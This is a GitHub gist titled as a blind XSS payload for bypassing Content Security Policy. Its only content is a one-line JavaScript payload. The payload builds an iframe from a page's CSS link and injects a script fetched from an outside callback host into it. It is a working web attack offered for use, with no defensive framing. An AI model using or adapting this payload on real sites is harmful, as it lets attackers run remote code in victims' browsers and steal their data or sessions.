Forked from Rhynorater/gist:311cf3981fda8303d65c27316e69209f
Created
September 4, 2018 06:00
-
-
Save nutronex/c90d62ed08fb4018262fe537fad43a9f to your computer and use it in GitHub Desktop.
BXSS - CSP Bypass with Inline and Eval
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| d=document;f=d.createElement("iframe");f.src=d.querySelector('link[href*=".css"]').href;d.body.append(f);s=d.createElement("script");s.src="https://rhy.xss.ht";setTimeout(function(){f.contentWindow.document.head.append(s);},1000) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment